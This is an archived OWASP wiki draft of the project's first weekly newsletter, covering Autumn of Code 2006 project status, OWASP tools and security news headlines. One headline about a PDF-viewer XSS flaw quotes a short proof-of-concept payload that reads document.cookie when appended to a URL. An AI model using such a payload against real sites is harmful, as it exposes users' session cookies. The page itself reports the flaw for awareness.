This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit

OWASP Newsletter 1

Revision as of 05:46, 8 January 2007 by Aholmes (talk | contribs) (AoC update)

Jump to: navigation, search

OWASP News – December 25th 2006 to December 31st 2006

Happy Holidays from all of us at OWASP!

I would like to take a moment to welcome you all to our first edition of the OWASP weekly newsletter and introduce myself. My name is Aaron Holmes and I have had the pleasure of maintaining the OWASP Autumn of Code 2006 Web Developer Project. It has been a rewarding and educational experience for myself, and I feel OWASP has benefited greatly by the many excellent projects which have been developed and advanced through the AoC 2006 program. With all this activity and excitement, we have decided that we should produce and distribute a weekly newsletter to keep everyone up to date on the direction of OWASP and our many great projects. We invite your feedback and news submissions which can be submitted to me directly by emailing [email protected] Enjoy!

In next week’s newsletter we will take a deeper look within a few of the aforementioned projects and explain how they can benefit you.

Until next week, happy coding!

Aaron M. Holmes OWASP Weekly Newsletter Editor and Website Developer

AoC update

[dinis note: rewrite this with details of where we are today. Put special focus on the projects that are completed (also indicate the two projects that will have the extra month)]

[Aaron note: Re-wrote section with basic project information. Feel free to update - perhaps the 3 outstanding projects now have status updated :)]

The end of 2006 marks an important time for OWASP with the successful completion of the Autumn of Code 2006. Four of the nine original projects have been completed and are now officially closed. The completed projects include CAL9000, OSG and ORG, the Testing Guide, and the website. Additionally, three other projects are up for completion and will be finalized in the very near future; including Pantera, Sherif, and OWASP Tiger (formally named Tools). The remaining two projects, WebScarab NX and LiveCD have been granted 1 month project extensions.

All projects have seen great developments which have been made possible by the hard work and efforts of our AoC participants, project leaders, and community members.

Featured Project - Aaron (use ORG and OSG instead)

OWASP Report Generator(ORG) and OWASP Site Generator(OSG) are projects that have recently been updated through the Autumn of Code.

ORG was produced originally by Dinis Cruz to fulfill the need of security reporting in his assessments for many different audiences. With ORG you can setup and track assessments including record findings, track the findings till they are fixed and run reports for different audiences that an assessment was done for.

OSG is a teaching tool that can be used to create basic sites that show off vulnerabilities. This allows for people teaching security to give specific examples of problems and for developers to look at real vulnerable code. {put description here}

Lastest additions to the WIKI

OWASP Community

OWASP related events, such as chapter meetings, OWASP conferences, get-togethers, and OWASP sponsored events.

OWASP News Headlines (from website)

  • Jan 2 - The Best Security Books Reference OWASP - There are over 50 security books that reference OWASP. Many of the authors are contributing to OWASP, speaking at our conferences, and participating in our chapters. Some of the books just recommend OWASP, but many are structured around OWASP, and others have whole chapters dedicated to our tools.
  • Nov 28 - JBroFuzz 0.3 Released - This version adds a more stable core, length updating for fuzzed POST requests and allows you to specify your own fuzz vectors in a separate file.
  • Nov 26 - OWASP Report Generator 0.88 Released - A tool for security consultants that supports the documentation and reporting of security vulnerabilities discovered during security.
  • Nov 26 - OWASP Site Generator v.70 Released - A tool that allows the creating of dynamic websites based on XML files and predefined vulnerabilities (some simple, some complex) for testing application security tools.
  • Nov 12 - New OWASP App Security Search Engine - We're beta-testing a new Google-powered search engine for application security. The engine indexes the OWASP site and all the other sites dedicated to application security on the Internet.

Application Security News (from

  • Jan 3 - XSS in ALL sites with PDF download - Critical XSS flaw that is trivial to exploit here in all but the very latest browsers. Attackers simply have to add a script like #attack=javascript:alert(document.cookie); to ANY URL that ends in .pdf (or streams a PDF). Solution is to not use PDF's or for Adobe to patch the planet.
  • Dec 14 - JavaScript error handler leaks information - An attacker can find out whether you're logged into your favorite website or not. They include a script tag where the src attribute doesn't point to a script, but instead to a page on your favorite websites. Based on the error the script parser generates when trying to parse the HTML of the page that's returned, the attacker can tell whether you're logged in or not. Should extend to access control easily. Protect yourself with CSRF protection.
  • Dec 13 - UCLA spins massive breach - Why not just say what measures you've really taken? Are all developers trained? Do you do code review and security testing? "Jim Davis, UCLA's chief information officer, said a computer trespasser used a program designed to exploit an undetected software flaw to bypass all security measures and gain access to the restricted database that contains information on about 800,000 current and former students, faculty and staff, as well as some student applicants and parents of students or applicants who applied for financial aid. 'In spite of our diligence, a sophisticated hacker found and exploited a subtle vulnerability in one of hundreds of applications,' Davis said in the statement."
  • Dec 2 - Oracle blames security researchers - "We do not credit security researchers who disclose the existence of vulnerabilities before a fix is available. We consider such practices, including disclosing 'zero day' exploits, to be irresponsible." So the question on everybody's mind - is the Oracle Software Security Assurance program real? Or are David Litchfield and Cesar Cerrudo right that Emperor has no clothes?